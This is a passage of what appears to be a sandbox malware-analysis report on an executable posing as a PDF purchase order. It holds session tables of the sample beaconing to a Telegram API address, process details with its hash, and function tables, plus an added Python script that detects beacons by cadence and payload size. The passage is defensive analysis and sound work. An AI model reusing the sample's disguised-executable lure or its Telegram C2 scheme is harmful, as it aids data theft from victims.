2024-12-19 14:29:56 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:59 UTC | 272 | OUT | |
2024-12-19 14:29:59 UTC | 1090 | OUT | |
2024-12-19 14:30:00 UTC | 388 | IN | |
2024-12-19 14:30:00 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.5 | 49827 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:08 UTC | 272 | OUT | |
2024-12-19 14:30:08 UTC | 1090 | OUT | |
2024-12-19 14:30:08 UTC | 388 | IN | |
2024-12-19 14:30:08 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.5 | 49859 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:20 UTC | 296 | OUT | |
2024-12-19 14:30:20 UTC | 1090 | OUT | |
2024-12-19 14:30:21 UTC | 388 | IN | |
2024-12-19 14:30:21 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.5 | 49871 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:25 UTC | 272 | OUT | |
2024-12-19 14:30:25 UTC | 1090 | OUT | |
2024-12-19 14:30:25 UTC | 388 | IN | |
2024-12-19 14:30:25 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.5 | 49883 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:29 UTC | 296 | OUT | |
2024-12-19 14:30:29 UTC | 1090 | OUT | |
2024-12-19 14:30:30 UTC | 388 | IN | |
2024-12-19 14:30:30 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.5 | 49893 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:33 UTC | 272 | OUT | |
2024-12-19 14:30:33 UTC | 1090 | OUT | |
2024-12-19 14:30:34 UTC | 388 | IN | |
2024-12-19 14:30:34 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
14 | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:37 UTC | 272 | OUT | |
2024-12-19 14:30:37 UTC | 1090 | OUT | |
2024-12-19 14:30:37 UTC | 388 | IN | |
2024-12-19 14:30:37 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
15 | 192.168.2.5 | 49917 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:41 UTC | 272 | OUT | |
2024-12-19 14:30:41 UTC | 1090 | OUT | |
2024-12-19 14:30:42 UTC | 388 | IN | |
2024-12-19 14:30:42 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
16 | 192.168.2.5 | 49925 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:45 UTC | 272 | OUT | |
2024-12-19 14:30:45 UTC | 1090 | OUT | |
2024-12-19 14:30:45 UTC | 388 | IN | |
2024-12-19 14:30:45 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
17 | 192.168.2.5 | 49937 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:49 UTC | 272 | OUT | |
2024-12-19 14:30:49 UTC | 1090 | OUT | |
2024-12-19 14:30:50 UTC | 388 | IN | |
2024-12-19 14:30:50 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
18 | 192.168.2.5 | 49947 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:53 UTC | 296 | OUT | |
2024-12-19 14:30:53 UTC | 1090 | OUT | |
2024-12-19 14:30:53 UTC | 388 | IN | |
2024-12-19 14:30:53 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
19 | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:30:56 UTC | 296 | OUT | |
2024-12-19 14:30:56 UTC | 1090 | OUT | |
2024-12-19 14:30:57 UTC | 388 | IN | |
2024-12-19 14:30:57 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
20 | 192.168.2.5 | 49967 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:31:01 UTC | 296 | OUT | |
2024-12-19 14:31:01 UTC | 1090 | OUT | |
2024-12-19 14:31:01 UTC | 388 | IN | |
2024-12-19 14:31:01 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
21 | 192.168.2.5 | 49979 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:31:06 UTC | 296 | OUT | |
2024-12-19 14:31:06 UTC | 1090 | OUT | |
2024-12-19 14:31:07 UTC | 388 | IN | |
2024-12-19 14:31:07 UTC | 541 | IN |
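The session tables above carry the one thing a detection engineer wants to quantify from this sample: 19 TLS sessions to 149.154.167.220:443 (the address the last two DNS answers returned; the extracted configuration names the api.telegram.org sendMessage URL as the C2) a few seconds apart, each with an identical 1090-byte OUT record, interleaved with plain-HTTP sessions to 132.226.247.73:80 (the first A record behind the checkip.dyndns.com CNAME) on the same cadence. The Python below is an added example, not part of the Joe Sandbox report: it transcribes the session start times and largest OUT record per session from the tables above (constructed input; CET stamps of the HTTP table converted to UTC) and profiles each destination for inter-session regularity and payload-size constancy. The minimum session count, jitter band and regularity threshold are assumptions, as is treating the smaller OUT record of each HTTPS session as the TLS handshake and the larger one as the request body.

```python
"""Beacon-cadence analysis over this report's session tables.

Added example, not part of the Joe Sandbox report. The session start
times and OUT sizes below are transcribed from the tables above; the
thresholds are assumptions, and the host names in the comments come
from the report's DNS answers and extracted configuration.
"""
from datetime import datetime
from statistics import median

# Transcribed from the session tables above, in UTC (the HTTP table's
# CET stamps converted by subtracting one hour). Per destination: the
# session start time and the largest OUT record of that session in
# bytes (assumption: the smaller OUT record of an HTTPS session is the
# TLS handshake, the larger one the encrypted request).
SESSIONS = {
    # Resolved by the last two DNS queries; the extracted config names
    # api.telegram.org/bot<token>/sendMessage as the C2 URL.
    ("149.154.167.220", 443): [
        ("14:29:41", 1090), ("14:29:45", 1090), ("14:29:48", 1090),
        ("14:29:52", 1090), ("14:29:55", 1090), ("14:29:59", 1090),
        ("14:30:08", 1090), ("14:30:20", 1090), ("14:30:25", 1090),
        ("14:30:29", 1090), ("14:30:33", 1090), ("14:30:37", 1090),
        ("14:30:41", 1090), ("14:30:45", 1090), ("14:30:49", 1090),
        ("14:30:53", 1090), ("14:30:56", 1090), ("14:31:01", 1090),
        ("14:31:06", 1090),
    ],
    # First A record behind the checkip.dyndns.com CNAME in the DNS table.
    ("132.226.247.73", 80): [
        ("14:29:30", 151), ("14:29:42", 127), ("14:29:46", 151),
        ("14:29:49", 151), ("14:29:53", 151), ("14:29:56", 151),
        ("14:30:00", 151), ("14:30:09", 151), ("14:30:21", 151),
        ("14:30:26", 151), ("14:30:30", 151), ("14:30:34", 151),
        ("14:30:37", 151), ("14:30:42", 151), ("14:30:45", 151),
        ("14:30:50", 151), ("14:30:53", 151), ("14:30:57", 151),
        ("14:31:01", 151),
    ],
    # One-off session: too few records to judge, kept as a negative case.
    ("104.21.67.152", 443): [("14:29:33", 85)],
}


def _seconds(hhmmss):
    """Clock time -> seconds since midnight (all sessions fall on one day)."""
    t = datetime.strptime(hhmmss, "%H:%M:%S")
    return t.hour * 3600 + t.minute * 60 + t.second


def profile(records, min_sessions=5, jitter=0.5, min_regularity=0.75):
    """Cadence and size statistics for one destination.

    Returns None when fewer than min_sessions records exist. The
    destination is flagged periodic when at least min_regularity of the
    inter-session gaps lie within +/- jitter * median of the median gap
    (both thresholds are assumptions, not values from the report)."""
    if len(records) < min_sessions:
        return None
    starts = sorted(_seconds(ts) for ts, _ in records)
    gaps = [b - a for a, b in zip(starts, starts[1:])]
    med = median(gaps)
    lo, hi = med * (1 - jitter), med * (1 + jitter)
    regularity = sum(1 for g in gaps if lo <= g <= hi) / len(gaps)
    sizes = sorted({size for _, size in records})
    return {
        "sessions": len(records),
        "median_gap_s": med,
        "regularity": round(regularity, 3),
        "periodic": regularity >= min_regularity,
        "body_sizes": sizes,
        "constant_body": len(sizes) == 1,
    }


def find_beacons(sessions=SESSIONS):
    """Map (ip, port) -> profile for each destination with enough sessions."""
    found = {}
    for dst, records in sessions.items():
        p = profile(records)
        if p is not None:
            found[dst] = p
    return found


if __name__ == "__main__":
    for (ip, port), p in find_beacons().items():
        verdict = ("BEACON" if p["periodic"] and p["constant_body"]
                   else "periodic" if p["periodic"] else "-")
        print(f"{ip}:{port:<3} n={p['sessions']:2d} "
              f"median_gap={p['median_gap_s']:.0f}s "
              f"regularity={p['regularity']:.2f} "
              f"sizes={p['body_sizes']} {verdict}")
```

Run against the transcribed data, the Telegram endpoint comes out with a 4-second median gap, 16 of 18 gaps inside the jitter band and a single 1090-byte body size, which is the combination worth alerting on: a fixed-size request repeated on a fixed cadence to a messaging API. The checkip destination is just as periodic but its OUT sizes vary (127 and 151 bytes), so it is reported as periodic without the constant-body flag; on a real network the same logic would be fed from Zeek conn logs or NetFlow rather than a transcribed table, and the TLS body size would be the SNI-level byte count rather than a sandbox record.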
Target ID: | 0 |
Start time: | 09:28:58 |
Start date: | 19/12/2024 |
Path: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 477'600 bytes |
MD5 hash: | 745504717878BB22B600DF7E2C2DD9F4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | low |
Has exited: | true |
Target ID: | 3 |
Start time: | 09:29:14 |
Start date: | 19/12/2024 |
Path: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 477'600 bytes |
MD5 hash: | 745504717878BB22B600DF7E2C2DD9F4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | low |
Has exited: | false |
Execution Graph
Execution Coverage: | 21.4% |
Dynamic/Decrypted Code Coverage: | 13.9% |
Signature Coverage: | 25% |
Total number of Nodes: | 1517 |
Total number of Limit Nodes: | 46 |
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
004032A0 | 89.7 | 32 | 19 | 401 | string, file, com, COMMON |
00404B30 | 63.5 | 33 | 3 | 481 | window, memory, COMMON |
00406077 | 19.5 | 8 | 3 | 207 | string, COMMON |
00405846 | 17.6 | 7 | 3 | 148 | file, string, COMMON |
00406398 | 3.0 | 2 | | 14 | file, COMMON |
004027FB | 1.5 | 1 | | 30 | file, COMMON |
0040389E | 47.5 | 14 | 13 | 215 | string, registry, COMMON |
00401767 | 15.9 | 5 | 4 | 145 | string, time, COMMON |
004025E5 | 10.7 | 5 | 1 | 151 | file, COMMON |
0040237B | 8.8 | 4 | 1 | 71 | registry, string, COMMON |
00401FC3 | 7.1 | 3 | 1 | 73 | library, COMMON |
004063BF | 7.0 | 3 | 1 | 34 | library, COMMON |
00405128 | 5.3 | 2 | 1 | 46 | window, COMMON |
00401389 | 3.0 | 2 | | 43 | window, COMMON |
00401DDC | 3.0 | 2 | | 21 | COMMON |
00405C2A | 3.0 | 2 | | 16 | file, COMMON |
00405700 | 3.0 | 2 | | 9 | COMMON |
100028A4 | 2.7 | 2 | | 156 | memory, COMMON |
00402786 | 1.5 | 1 | | 26 | COMMON |
0040229D | 1.5 | 1 | | 25 | COMMON |
00405CDC | 1.5 | 1 | | 22 | file, COMMON |
00405CAD | 1.5 | 1 | | 22 | file, COMMON |
100027C7 | 1.5 | 1 | | 21 | memory, COMMON |
0040159B | 1.5 | 1 | | 18 | COMMON |
0040414E | 1.5 | 1 | | 6 | window, COMMON |
00403258 | 1.5 | 1 | | 6 | COMMON |
004052F3 | 65.0 | 36 | 1 | 284 | window, clipboard, memory, COMMON |
004045B4 | 23.0 | 10 | 3 | 275 | string, COMMON |
0040686A | 0.3 | | | 334 | COMMON |
00407041 | 0.3 | | | 300 | COMMON |
004042B6 | 42.2 | 20 | 4 | 207 | window, string, COMMON |
00405D84 | 24.6 | 11 | 3 | 131 | string, memory, COMMON |
00404180 | 12.1 | 8 | | 61 | COMMON |
00404A7E | 10.5 | 5 | 1 | 48 | window, COMMON |
00402D04 | 10.5 | 5 | 1 | 40 | time, COMMON |
100022D0 | 9.1 | 6 | | 136 | memory, COMMON |
100024A9 | 9.1 | 6 | | 98 | COMMON |
00402537 | 8.8 | 3 | 2 | 67 | string, COMMON |
100018A9 | 7.7 | 5 | | 189 | COMMON |
100015FF | 7.5 | 5 | | 41 | memory, library, loader, COMMON |
00401CFA | 7.5 | 5 | | 39 | window, COMMON |
00404970 | 7.1 | 3 | 1 | 84 | string, COMMON |
00401BDF | 7.1 | 3 | 1 | 76 | window, time, COMMON |
00405F22 | 7.0 | 3 | 1 | 45 | registry, COMMON |
00405A09 | 7.0 | 3 | 1 | 16 | string, COMMON |
00401B37 | 6.1 | 2 | 2 | 72 | memory, COMMON |
00402D8A | 6.0 | 4 | | 33 | COMMON |
00405B11 | 5.3 | 2 | 1 | 47 | string, COMMON |
00405735 | 5.3 | 2 | 1 | 24 | process, COMMON |
00405A55 | 5.3 | 2 | 1 | 16 | string, COMMON |
100010E1 | 5.1 | 4 | | 104 | memory, COMMON |
00405B8F | 5.0 | 4 | | 37 | string, COMMON |
Execution Graph
Execution Coverage: | 12.4% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 3.1% |
Total number of Nodes: | 196 |
Total number of Limit Nodes: | 15 |
Function | Relevance | APIs | Strings | Instructions | Tags | Control-flow Graph |
---|---|---|---|---|---|---|
00155F90 | 6.7 | | 5 | 467 | COMMON | yes |
00158DA0 | 6.1 | | 4 | 1138 | COMMON | |
00155968 | 3.0 | | 2 | 511 | COMMON | |
00154328 | 2.7 | | 2 | 194 | COMMON | yes |
35E6E7C8 | 2.0 | | 1 | 764 | COMMON | |
3593BDF0 | 2.0 | | 1 | 758 | COMMON | |
35938650 | .7 | | | 709 | COMMON | |
32B3C638 | .3 | | | 313 | COMMON | |
32B303AF | .3 | | | 274 | COMMON | |
32B30C1A | .2 | | | 237 | COMMON | |
32B30C28 | .2 | | | 220 | COMMON | |
35939D10 | .2 | | | 219 | COMMON | |
3593A360 | .2 | | | 219 | COMMON | |
359396C8 | .2 | | | 218 | COMMON | |
3593A9B0 | .2 | | | 218 | COMMON | |
32B30F6F | .2 | | | 202 | COMMON | |
3593BA99 | .2 | | | 190 | COMMON | |
3593864C | .2 | | | 165 | COMMON | |
3593A9A9 | .2 | | | 162 | COMMON | |
359396C4 | .2 | | | 160 | COMMON | |
35E6F316 | .2 | | | 154 | COMMON | |
3593C92F | .2 | | | 153 | COMMON | |
35938642 | .2 | | | 151 | COMMON | |
35938647 | .2 | | | 151 | COMMON | |
359396B8 | .1 | | | 149 | COMMON | |
35939D0D | .1 | | | 104 | COMMON | |
3593A35C | .1 | | | 104 | COMMON | |
35939D00 | .1 | | | 92 | COMMON | |
3593A351 | .1 | | | 92 | COMMON | |
35939D04 | .1 | | | 90 | COMMON | |
Function | Relevance | APIs | Strings | Instructions | Tags | Control-flow Graph |
---|---|---|---|---|---|---|
001566B8 | 10.5 | | 8 | 456 | COMMON | yes |
001519B8 | 8.2 | | 6 | 683 | COMMON | yes |
35E60980 | 6.1 | 4 | | 128 | thread, COMMON | yes |
3593D548 | 3.9 | | 3 | 151 | COMMON | yes |
00157458 | 3.2 | | 2 | 704 | COMMON | yes |
00154F00 | 2.8 | | 2 | 329 | COMMON | yes |
00155460 | 2.7 | | 2 | 228 | COMMON | yes |
00158D90 | 2.7 | | 2 | 190 | COMMON | |
00158D19 | 2.5 | | 2 | 44 | COMMON | |
35E6010D | 1.6 | 1 | | 114 | COMMON | |
35E60110 | 1.6 | 1 | | 113 | COMMON | |
35E61DC0 | 1.6 | 1 | | 93 | COMMON | |
35E60BC8 | 1.6 | 1 | | 62 | COMMON | |
35E6C560 | 1.5 | 1 | | 46 | com, COMMON | |
35E6C60C | 1.5 | 1 | | 46 | window, COMMON | |
35E62020 | 1.5 | 1 | | 44 | time, COMMON | |
00150B29 | 1.5 | | 1 | 203 | COMMON | |
00150B30 | 1.4 | | 1 | 200 | COMMON | |
00159EB0 | 1.4 | | 1 | 121 | COMMON | |
3593C175 | .3 | | | 322 | COMMON | |
3593C173 | .3 | | | 319 | COMMON | |
00156C98 | .2 | | | 201 | COMMON | |
0015AF90 | .2 | | | 201 | COMMON | |
00158A4B | .2 | | | 196 | COMMON | |
3593FAB0 | .2 | | | 189 | COMMON | |
3593C4CF | .2 | | | 155 | COMMON | |
359396C0 | .2 | | | 152 | COMMON | |
35937920 | .1 | | | 147 | COMMON | |
3593CC28 | .1 | | | 146 | COMMON | |
00153168 | .1 | | | 134 | COMMON | |
35938721 | .1 | | | 130 | COMMON | |
001592C3 | .1 | | | 126 | COMMON | |
00158BF0 | .1 | | | 105 | COMMON | |
00154620 | .1 | | | 101 | COMMON | |
35939D09 | .1 | | | 96 | COMMON | |
3593A358 | .1 | | | 96 | COMMON | |
00156F30 | .1 | | | 91 | COMMON | |
3593CF68 | .1 | | | 88 | COMMON | |
00156F40 | .1 | | | 87 | COMMON | |
3593CF59 | .1 | | | 80 | COMMON | |
001518C8 | .1 | | | 77 | COMMON | |
001552C8 | .1 | | | 74 | COMMON | |
00151776 | .1 | | | 73 | COMMON | |
35937922 | .1 | | | 72 | COMMON | |
000AD030 | .1 | | | 72 | COMMON | |
00150EC8 | .1 | | | 70 | COMMON | |
0015324D | .1 | | | 68 | COMMON | |
0015461D | .1 | | | 65 | COMMON | |
00158729 | .1 | | | 65 | COMMON | |
0015FE60 | .1 | | | 63 | COMMON | |
35937911 | .1 | | | 62 | COMMON | |
35937914 | .1 | | | 62 | COMMON | |
001552C0 | .1 | | | 61 | COMMON | |
0015B2C8 | .1 | | | 59 | COMMON | |
001517B8 | .1 | | | 59 | COMMON | |
3593B9C8 | .1 | | | 56 | COMMON | |
0015B2E0 | .1 | | | 56 | COMMON | |
000AD02B | .1 | | | 53 | COMMON | |
00154E5F | .1 | | | 52 | COMMON | |
3593E7F4 | .0 | | | 50 | COMMON | |
0015B2F0 | .0 | | | 49 | COMMON | |
0015FFB0 | .0 | | | 44 | COMMON | |
0015FC3E | .0 | | | 42 | COMMON | |
359395E8 | .0 | | | 39 | COMMON | |
3593CE60 | .0 | | | 39 | COMMON | |
35939608 | .0 | | | 35 | COMMON | |
0015B158 | .0 | | | 32 | COMMON | |
0015FE12 | .0 | | | 28 | COMMON | |
00151877 | .0 | | | 25 | COMMON | |
0015FE20 | .0 | | | 23 | COMMON | |
00151888 | .0 | | | 19 | COMMON | |
3593BDA9 | .0 | | | 18 | COMMON | |
001556FF | .0 | | | 18 | COMMON | |
00157EC0 | .0 | | | 18 | COMMON | |
0015FF22 | .0 | | | 18 | COMMON | |
00159F6D | .0 | | | 16 | COMMON | |
359395D8 | .0 | | | 15 | COMMON | |
3593D095 | .0 | | | 15 | COMMON | |
0015FF30 | .0 | | | 15 | COMMON | |
3593BD48 | .0 | | | 13 | COMMON | |
359394B4 | .0 | | | 12 | COMMON | |
00155710 | .0 | | | 12 | COMMON | |
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
004032A0 | 77.4 | 32 | 12 | 401 | string, file, com, COMMON |
00404B30 | 63.5 | 33 | 3 | 481 | window, memory, COMMON |
00405846 | 14.1 | 7 | 1 | 148 | file, string, COMMON |
3593AFF8 | 11.7 | | 9 | 461 | COMMON |
35937B52 | 1.8 | | 1 | 584 | COMMON |
32B3C1E0 | .3 | | | 276 | COMMON |
32B3BD88 | .3 | | | 275 | COMMON |
32B3B07F | .3 | | | 274 | COMMON |
32B3B930 | .3 | | | 274 | COMMON |
32B3E339 | .3 | | | 273 | COMMON |
32B3F042 | .3 | | | 273 | COMMON |
32B3DEE1 | .3 | | | 273 | COMMON |
35934DB0 | .3 | | | 268 | COMMON |
35932560 | .3 | | | 268 | COMMON |
35931CB0 | .3 | | | 268 | COMMON |
359374C8 | .3 | | | 268 | COMMON |
35936C18 | .3 | | | 268 | COMMON |
35931400 | .3 | | | 268 | COMMON |
35930FA8 | .3 | | | 268 | COMMON |
359367C0 | .3 | | | 268 | COMMON |
35935F10 | .3 | | | 268 | COMMON |
35933F70 | .3 | | | 268 | COMMON |
359336C0 | .3 | | | 268 | COMMON |
35932E10 | .3 | | | 268 | COMMON |
35935660 | .3 | | | 268 | COMMON |
359329B8 | .3 | | | 268 | COMMON |
35932108 | .3 | | | 268 | COMMON |
35934820 | .3 | | | 268 | COMMON |
35931858 | .3 | | | 268 | COMMON |
35937070 | .3 | | | 268 | COMMON |
359343C8 | .3 | | | 268 | COMMON |
35933B18 | .3 | | | 268 | COMMON |
35936368 | .3 | | | 268 | COMMON |
35935AB8 | .3 | | | 268 | COMMON |
35935208 | .3 | | | 268 | COMMON |
35933268 | .3 | | | 268 | COMMON |
32B3EBF7 | .3 | | | 268 | COMMON |
32B3E79F | .3 | | | 268 | COMMON |
32B3DA9C | .3 | | | 265 | COMMON |
32B3B4EC | .3 | | | 265 | COMMON |
35938193 | .2 | | | 193 | COMMON |
35938373 | .1 | | | 116 | COMMON |
35E6F5D8 | .0 | | | 18 | COMMON |
3593CBE7 | .0 | | | 17 | COMMON |
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
004052F3 | 65.0 | 36 | 1 | 284 | window, clipboard, memory, COMMON |
004042B6 | 40.5 | 20 | 3 | 207 | window, string, COMMON |
0040389E | 37.0 | 13 | 8 | 215 | string, registry, COMMON |
00405D84 | 24.6 | 11 | 3 | 131 | string, memory, COMMON |
004045B4 | 19.5 | 10 | 1 | 275 | string, COMMON |
00406077 | 17.7 | 8 | 2 | 207 | string, COMMON |
00404180 | 12.1 | 8 | | 61 | COMMON |
004025E5 | 10.7 | 5 | 1 | 151 | file, COMMON |
00404A7E | 10.5 | 5 | 1 | 48 | window, COMMON |
00402D04 | 10.5 | 5 | 1 | 40 | time, COMMON |
00401CFA | 7.5 | 5 | | 39 | window, COMMON |
00401D56 | 7.5 | 5 | | 38 | COMMON |
00404970 | 7.1 | 3 | 1 | 84 | string, COMMON |
00401BDF | 7.1 | 3 | 1 | 76 | window, time, COMMON |
004063BF | 7.0 | 3 | 1 | 34 | library, COMMON |
00405683 | 6.0 | 4 | | 39 | COMMON |
00402D8A | 6.0 | 4 | | 33 | COMMON |
00405128 | 5.3 | 2 | 1 | 46 | window, COMMON |
00405735 | 5.3 | 2 | 1 | 24 | process, COMMON |
00151A40 | 5.1 | | 4 | 98 | COMMON |
001558E8 | 5.0 | | 4 | 49 | COMMON |
00405B8F | 5.0 | 4 | | 37 | string, COMMON |